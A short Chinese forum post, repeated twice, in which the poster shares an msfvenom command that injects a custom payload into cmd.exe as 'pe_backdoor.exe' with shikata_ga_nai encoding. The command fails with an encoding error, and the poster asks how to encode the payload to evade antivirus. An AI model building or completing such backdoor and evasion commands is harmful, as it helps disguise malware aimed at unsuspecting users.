level 1
滴耳露
楼主
想创建一个自定义的payload的时候发生了如下的错误:
cat test.exe | msfvenom -p - -a win --platform x86 -e x86/shikata_ga_nai -b '\x00' -x cmd.exe -i 1 -f exe -o pe_backdoor.exe
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with An encoding exception occurred.
Error: An encoding exception occurred.
应该怎样编码免杀自己定义的payload?
2019年11月21日 10点11分
1
cat test.exe | msfvenom -p - -a win --platform x86 -e x86/shikata_ga_nai -b '\x00' -x cmd.exe -i 1 -f exe -o pe_backdoor.exe
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with An encoding exception occurred.
Error: An encoding exception occurred.
应该怎样编码免杀自己定义的payload?